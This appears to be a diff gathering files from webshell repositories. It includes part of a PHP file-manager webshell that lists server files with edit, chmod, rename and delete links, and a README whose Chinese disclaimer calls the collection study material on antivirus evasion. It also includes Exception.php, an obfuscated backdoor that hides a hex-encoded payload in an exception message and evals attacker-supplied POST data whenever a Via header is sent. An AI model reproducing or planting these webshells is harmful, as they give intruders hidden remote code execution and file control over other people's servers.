+        echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+        <td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
+        <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+        <td style='width: 5%'><center><a title='edit ".$iota."' href='?path=".base64_encode("#E".$path.$slash.$iota)."'>E</a>
+        <a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+        <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
+        </tr>";
+    } else {
+        if ($pathType[0] == "application") {
+            echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+            <td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
+            <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+            <td style='width: 5%'><center><a title='edit ".$iota."' href='?path=".base64_encode("#E".$path.$slash.$iota)."'>E</a>
+            <a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+            <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
+            </tr>";
+        }
+    }
+}
+
+for ($i = 0; $i < count($scanPath); $i++) {
+
+    $iota = $scanPath[$i];
+    $pathType = mime_content_type($path.$slash.$iota);
+    $pathType = explode("/", $pathType);
+    if ($pathType[0] !== "application") {
+        if ($pathType[0] !== "text") {
+            if (is_file($path.$slash.$iota)) {
+
+                $sizeA = filesize($path.$slash.$iota);
+                $filesize = $sizeA;
+                $sizeks = "B";
+                if ($sizeA > 1024) {
+                    $filesize = round($sizeA / 1024);
+                    $sizeks = "KB";
+                }  if ($sizeA > 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024);
+                    $sizeks = "MB";
+                } if ($sizeA > 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024);
+                    $sizeks = "GB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "TB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "PB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "EB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "ZB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024  * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "YB";
+                }
+
+                $result = filemtime($path.$slash.$iota); $result = getdate($result);
+                $one = strlen($result["mday"]); $two = strlen($result["mon"]);
+                $three = strlen($result["year"]); $four = strlen($result["hours"]);
+                $five = strlen($result["minutes"]);
+                if ($one == "1") {
+                    $result["mday"] = "0".$result["mday"];
+                } if ($two == "1") {
+                    $result["mon"] = "0".$result["mon"];
+                } if ($three == "1") {
+                    $result["year"] = "0".$result["year"];
+                } if ($four == "1") {
+                    $result["hours"] = "0".$result["hours"];
+                } if ($five == "1") {
+                    $result["minutes"] = "0".$result["minutes"];
+                } $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
+
+                echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+                <td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
+                <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+                <td style='width: 5%'><center><a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+                <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td></tr>";
+            }
+        }
+    }
+}
+
+echo "</table><hr color='Gray'><center>coded by upsilonCrash</form>";
+
+?>

webshell-free/README.md

@@ -0,0 +1,19 @@
+# webshell-free
+![visitor badge](https://visitor-badge.glitch.me/badge?page_id=https://github.com/rexSurprise/webshell-free.git)
+## ！！！声明！！！
+
+**本程序仅供于学习交流，请使用者遵守《中华人民共和国网络安全法》，勿将此脚本用于非授权的测试，脚本开发者不负任何连带法律责任。**
+
+
+
+webshell免杀案例
+
+
+
+包含大佬开发的项目
+
+✅ [JSP-Webshells](https://github.com/threedr3am/JSP-WebShells)
+
+✅ [webshell-venom](https://github.com/yzddmr6/webshell-venom)
+
+### https://github.com/rexSurprise/webshell-free

webshell-free/php/Exception.php

@@ -0,0 +1,16 @@
+<?php
+try{
+    $value = 'echo "hello~"';
+    apply();
+}catch(Exception $e){
+    eval(pack('H*',$e->getMessage()));
+}finally{
+    eval($value.';');
+}
+
+function apply(){
+  if(isset($_SERVER['HTTP_VIA'])){
+    throw new Exception('2476616c75653d656e6428245f504f5354293b');
+  }
+  return false;
+}

xl7dev/webshell/other/webshell/read.me

@@ -0,0 +1 @@
+fix error

zxc7528064/-WebShell-/README.md

@@ -0,0 +1,3 @@
+## -WebShell-
+
+from :https://github.com/zxc7528064/-WebShell-